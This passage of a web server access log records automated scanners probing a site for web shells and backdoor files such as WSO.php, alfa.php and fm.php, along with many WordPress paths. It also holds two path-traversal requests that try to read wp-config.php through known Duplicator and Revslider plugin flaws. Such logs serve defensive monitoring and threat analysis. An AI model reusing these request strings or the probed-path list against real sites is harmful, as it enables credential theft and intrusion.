(Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:05:25 -0400] "GET /i.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:05:28 -0400] "GET /p.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:05:38 -0400] "GET /q.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:05:47 -0400] "GET /s.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:06:01 -0400] "GET /.well-known/acme-challenge/class.api.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:06:01 -0400] "GET /d.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:06:04 -0400] "GET /h.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:06:10 -0400] "GET /j.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:06:22 -0400] "GET /k.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:06:32 -0400] "GET /l.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:06:37 -0400] "GET /n.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:06:43 -0400] "GET /xindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:06:49 -0400] "GET /kindex.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:06:59 -0400] "GET /FoxWSOv1.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:07:04 -0400] "GET /alf.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:07:11 -0400] "GET /bb.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:07:12 -0400] "GET /wp-includes/class.api.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:07:15 -0400] "GET /lf.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.41.79.192 - - [12/Aug/2025:22:07:19 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 279 "-" "-" 20.41.79.192 - - [12/Aug/2025:22:07:20 -0400] "GET /law2.php HTTP/1.1" 301 239 "-" "-" 20.41.79.192 - - [12/Aug/2025:22:07:20 -0400] "GET /law3.php HTTP/1.1" 301 239 "-" "-" 20.41.79.192 - - [12/Aug/2025:22:07:20 -0400] "GET /law4.php HTTP/1.1" 301 239 "-" "-" 20.41.79.192 - - [12/Aug/2025:22:07:20 -0400] "GET /law5.php HTTP/1.1" 301 239 "-" "-" 20.41.79.192 - - [12/Aug/2025:22:07:21 -0400] "GET /law6.php HTTP/1.1" 301 239 "-" "-" 20.41.79.192 - - [12/Aug/2025:22:07:21 -0400] "GET /law7.php HTTP/1.1" 301 239 "-" "-" 20.41.79.192 - - [12/Aug/2025:22:07:21 -0400] "GET /law8.php HTTP/1.1" 301 239 "-" "-" 20.41.79.192 - - [12/Aug/2025:22:07:21 -0400] "GET /law9.php HTTP/1.1" 301 239 "-" "-" 20.41.79.192 - - [12/Aug/2025:22:07:22 -0400] "GET /law10.php HTTP/1.1" 301 240 "-" "-" 94.16.113.252 - - [12/Aug/2025:22:07:23 -0400] "GET /WSO.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:07:28 -0400] "GET /xxx.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:07:32 -0400] "GET /hello.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:07:34 -0400] "GET /ok.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:07:43 -0400] "GET /if.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:07:48 -0400] "GET /kk.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:07:59 -0400] "GET /mrjn.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:08:08 -0400] "GET /kn.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:08:10 -0400] "GET /3301.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:08:23 -0400] "GET /leaf.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:08:25 -0400] "GET /alex.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:08:34 -0400] "GET /mailer.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:08:45 -0400] "GET /anone.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:08:55 -0400] "GET /wp-configer.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:09:12 -0400] "GET /wp-ad.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:09:22 -0400] "GET /send.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:09:27 -0400] "GET /3.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:09:33 -0400] "GET /.wp-cache.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:09:50 -0400] "GET /sendmail.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:10:08 -0400] "GET /rahma.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:10:17 -0400] "GET /nasgor.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:10:19 -0400] "GET /wp-confirm.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:22:10:33 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:22:10:33 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:22:10:33 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:22:10:33 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:22:10:40 -0400] "GET /alfa123.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:10:44 -0400] "GET /upload.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:10:48 -0400] "GET /bypass.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:10:55 -0400] "GET /wp-one.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:10:57 -0400] "GET /alexus.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.41.81.29 - - [12/Aug/2025:22:11:02 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 279 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:03 -0400] "GET /function/yes.php HTTP/1.1" 301 247 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:03 -0400] "GET /wp-includes/Text/Diff/Engine/up%20/wp-content/plugins/seoplugins/wp-damin.php HTTP/1.1" 301 308 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:03 -0400] "GET /wp-content/plugins/linkpreview/hehe.php HTTP/1.1" 301 270 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:04 -0400] "GET /modules/mod_simplefileuploadv1.3/elements/yes.php HTTP/1.1" 301 280 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:04 -0400] "GET /wp-content/themes/cay-van-phong/setup-config.php HTTP/1.1" 301 279 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:04 -0400] "GET /wp-content/uploads/makeasmtp.php HTTP/1.1" 301 263 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:04 -0400] "GET /wp-content/themes/cay-van-phong/xp.php HTTP/1.1" 301 269 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:04 -0400] "GET /wp-includes/assets/rk2.php HTTP/1.1" 301 257 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:05 -0400] "GET /wp-includes/js/codemirror/jp.php HTTP/1.1" 301 263 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:05 -0400] "GET /wp-includes/pomo/json.php HTTP/1.1" 301 256 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:05 -0400] "GET /wp-includes/rest-api/file.php HTTP/1.1" 301 260 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:05 -0400] "GET /wp-includes/block-patterns/bless.php HTTP/1.1" 301 267 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:06 -0400] "GET /wp-content/plugins/log.php HTTP/1.1" 301 257 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:06 -0400] "GET /wp-content/themes/403.php HTTP/1.1" 301 256 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:06 -0400] "GET /elements/02.php HTTP/1.1" 301 246 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:06 -0400] "GET /wp-includes/theme-compat/wp-conflg.php HTTP/1.1" 301 269 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:06 -0400] "GET /wp-content/plugins/google-seo-rank/cong.php HTTP/1.1" 301 274 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:07 -0400] "GET /.well-known/worksec.php HTTP/1.1" 301 254 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:07 -0400] "GET /wp-includes/IXR/core.php%20/wp-includes/images/smilies/edit-tags.php HTTP/1.1" 301 299 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:07 -0400] "GET /about/lock360.php HTTP/1.1" 301 248 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:07 -0400] "GET /wp-includes/images/wlw/go.php HTTP/1.1" 301 260 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:08 -0400] "GET /wp-admin/css/colors/blue/system_log.php HTTP/1.1" 301 270 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:08 -0400] "GET /cgi-bin/cgi-bin/autoload_classmap.php HTTP/1.1" 301 268 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:08 -0400] "GET /cgi-bin/fm.php HTTP/1.1" 301 245 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:08 -0400] "GET /wp-content/themes/twentytwentytwo/yes.php HTTP/1.1" 301 272 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:09 -0400] "GET /update/packed.php HTTP/1.1" 301 248 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:09 -0400] "GET /wp-includes/images/wlw/0x.php HTTP/1.1" 301 260 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:09 -0400] "GET /wp-includes/blocks/themes.php HTTP/1.1" 301 260 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:09 -0400] "GET /wp-includes/images/wlw/item.php HTTP/1.1" 301 262 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:09 -0400] "GET /wp-admin/css/getid3s.php HTTP/1.1" 301 255 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:10 -0400] "GET /wp-includes/wp-mail.php HTTP/1.1" 301 254 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:10 -0400] "GET /wp-content/uploads/fucku.php HTTP/1.1" 301 259 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:10 -0400] "GET /wp-admin/maint/wp.php HTTP/1.1" 301 252 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:10 -0400] "GET /wp-includes/Text/Diff/Engine/moon.php HTTP/1.1" 301 268 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:11 -0400] "GET /wp-includes/block-patterns/core.php HTTP/1.1" 301 266 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:11 -0400] "GET /wp-content/upgrade-temp-backup/cc.php HTTP/1.1" 301 268 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:11 -0400] "GET /wp-mail.php/wp-includes/ID3/xp.php HTTP/1.1" 301 265 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:11 -0400] "GET /wp-includes/rest-api/endpoints/network.php HTTP/1.1" 301 273 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:12 -0400] "GET /wp-content/plugins/wp-help/ben.php HTTP/1.1" 301 265 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:12 -0400] "GET /wp-content/themes/moon.php HTTP/1.1" 301 257 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:12 -0400] "GET /wp-includes/html-api/readme.php HTTP/1.1" 301 262 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:12 -0400] "GET /wp-admin/network/getid3s.php HTTP/1.1" 301 259 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:12 -0400] "GET /wp-content/plugins/hellopress/moon.php HTTP/1.1" 301 269 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:13 -0400] "GET /wp-includes/php-compat/as.php HTTP/1.1" 301 260 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:13 -0400] "GET /wp-includes/widgets/fm.php HTTP/1.1" 301 257 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:13 -0400] "GET /index/media.php HTTP/1.1" 301 246 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:13 -0400] "GET /wp-content/mu-plugins/alfa.php HTTP/1.1" 301 261 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:14 -0400] "GET /wp-includes/js/manager.php HTTP/1.1" 301 257 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:14 -0400] "GET /admin/readme.php HTTP/1.1" 301 247 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:14 -0400] "GET /wp-includes/f35.php HTTP/1.1" 301 250 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:14 -0400] "GET /wp-includes/widgets/themes.php HTTP/1.1" 301 261 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:15 -0400] "GET /wp-includes/images/smilies/defaults.php HTTP/1.1" 301 270 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:15 -0400] "GET /.well-known/up.php HTTP/1.1" 301 249 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:15 -0400] "GET /admin/cc.php HTTP/1.1" 301 243 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:15 -0400] "GET /wp-includes/sitemaps/providers/xp.php HTTP/1.1" 301 268 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:15 -0400] "GET /wp-includes/block-supports/baxa1.phP HTTP/1.1" 301 267 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:16 -0400] "GET /xp.php%20/files/xmrlpc.php HTTP/1.1" 301 257 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:16 -0400] "GET /wp-admin/css/as.php HTTP/1.1" 301 250 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:16 -0400] "GET /wp-includes/html-api/wp.php HTTP/1.1" 301 258 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:16 -0400] "GET /wp-admin/includes/ty.php HTTP/1.1" 301 255 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:17 -0400] "GET /index/gecko-litespeed.php HTTP/1.1" 301 256 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:17 -0400] "GET /doc.php HTTP/1.1" 301 238 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:17 -0400] "GET /wp-admin/wp-conflg.php?p= HTTP/1.1" 301 256 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:17 -0400] "GET /wp-content/function.php HTTP/1.1" 301 254 "-" "-" 20.41.81.29 - - [12/Aug/2025:22:11:17 -0400] "GET /wp-admin/classwithtostring.php HTTP/1.1" 301 261 "-" "-" 94.16.113.252 - - [12/Aug/2025:22:11:23 -0400] "GET /wso1337.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:11:27 -0400] "GET /1337.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:11:33 -0400] "GET /blog.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:11:37 -0400] "GET /it.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:11:44 -0400] "GET /kiss.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:11:46 -0400] "GET //wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1" 301 311 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:11:52 -0400] "GET /0.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:05 -0400] "GET //wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 301 311 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:10 -0400] "GET /wp2.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:17 -0400] "GET /owl.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:19 -0400] "GET /vuln.php HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:20 -0400] "GET /ohayo.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:29 -0400] "GET /wp-admin.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 